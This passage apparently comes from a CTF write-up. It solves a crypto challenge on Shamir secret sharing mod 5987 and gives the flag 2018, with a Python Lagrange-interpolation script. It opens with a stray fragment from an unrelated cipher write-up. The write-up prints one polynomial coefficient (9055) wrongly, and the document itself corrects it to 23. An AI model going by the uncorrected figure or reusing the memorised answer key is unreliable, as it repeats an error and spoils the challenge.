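```

Six full repetitions of a seven-letter key inside the first 42 characters are what make the period unambiguous; with only a short known fragment the same code returns a stream whose period is the fragment length, which is the signal to collect more known plaintext.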

 

 

 

Shamir: Important Data Damaged

Points: 150  Type: Crypto  Solved

Challenge:

Shamir, CEO of a corporation, split the important secret data on his laptop into 5 shares, stored on 5 separate storage devices, such that at least 3 shares are needed to reconstruct the original secret. The modulus used by the sharing scheme is 5987. A virus on Shamir's laptop damaged the secret beyond repair, so Shamir had a technician reconstruct it from the shares on devices 5, 7 and 9. Device 5 holds (5, 2258), device 7 holds (7, 2424) and device 9 holds (9, 2630). What secret does the technician reconstruct?

Hint: polynomial f(x), x = 5, 7, 9

Searching for Shamir (k, n) secret sharing gives the reconstruction method:

https://en.wikipedia.org/wiki/Shamir%27s_Secret_Sharing#Reconstruction

Write out the shares:
D0 = (5, 2258)  D1 = (7, 2424)  D2 = (9, 2630)

Lagrange basis polynomials:
t0 = ((x-9)/(5-9)) * ((x-7)/(5-7))
t1 = ((x-9)/(7-9)) * ((x-5)/(7-5))
t2 = ((x-5)/(9-5)) * ((x-7)/(9-7))
f(x) = Σ y_i·t_i = 2018 + 9055x + 5x^2

The secret is the constant term f(0).

key: 2018
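The reconstruction carried out in code, as an added example (not the team's own): Lagrange interpolation over GF(5987) evaluated at x = 0 gives the secret directly, and expanding the basis polynomials gives the coefficients. The shares and modulus are the challenge's; the extra shares generated at the end are computed from the recovered polynomial to show that any other three shares reconstruct the same secret while two shares do not.

```python
P = 5987   # modulus stated in the challenge (prime)
SHARES = [(5, 2258), (7, 2424), (9, 2630)]   # devices 5, 7 and 9


def lagrange_at(shares, x, p):
    """Evaluate the interpolating polynomial through `shares` at x, all arithmetic mod p."""
    total = 0
    for i, (xi, yi) in enumerate(shares):
        num, den = 1, 1
        for j, (xj, _) in enumerate(shares):
            if i != j:
                num = num * (x - xj) % p
                den = den * (xi - xj) % p
        total = (total + yi * num * pow(den, -1, p)) % p
    return total


def reconstruct_secret(shares, p=P):
    """Shamir's secret is f(0)."""
    return lagrange_at(shares, 0, p)


def polynomial_coefficients(shares, p=P):
    """Expand sum_i y_i * t_i(x) into coefficients [a0, a1, ...] mod p (low degree first)."""
    k = len(shares)
    coeffs = [0] * k
    for i, (xi, yi) in enumerate(shares):
        basis = [1]   # coefficients of prod_{j != i} (x - xj), built up one factor at a time
        den = 1
        for j, (xj, _) in enumerate(shares):
            if i != j:
                new = [0] * (len(basis) + 1)
                for d, c in enumerate(basis):
                    new[d] = (new[d] - c * xj) % p   # c * x^d * (-xj)
                    new[d + 1] = (new[d + 1] + c) % p   # c * x^d * x
                basis = new
                den = den * (xi - xj) % p
        scale = yi * pow(den, -1, p) % p
        for d in range(k):
            coeffs[d] = (coeffs[d] + basis[d] * scale) % p
    return coeffs


def new_share(coeffs, x, p=P):
    """Generate the share a dealer would have stored for device x (used here for the demo only)."""
    return x, sum(c * pow(x, d, p) for d, c in enumerate(coeffs)) % p


if __name__ == "__main__":
    print("secret:", reconstruct_secret(SHARES))
    coeffs = polynomial_coefficients(SHARES)
    print("f(x) coefficients [a0, a1, a2]:", coeffs)
    others = [new_share(coeffs, 1), new_share(coeffs, 2), SHARES[2]]
    print("from devices 1, 2, 9:", reconstruct_secret(others))
    print("from only two shares:", reconstruct_secret(SHARES[:2]))
```

Running it gives 2018 for the secret, agreeing with the write-up; the coefficient list comes out as [2018, 23, 5], so the linear term is 23 (the 9055 printed above does not reproduce the shares, e.g. 2018 + 9055·5 + 5·25 is not 2258 mod 5987), while the constant term, which is all the challenge asks for, is the same either way.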

 

 

 

 

 

 
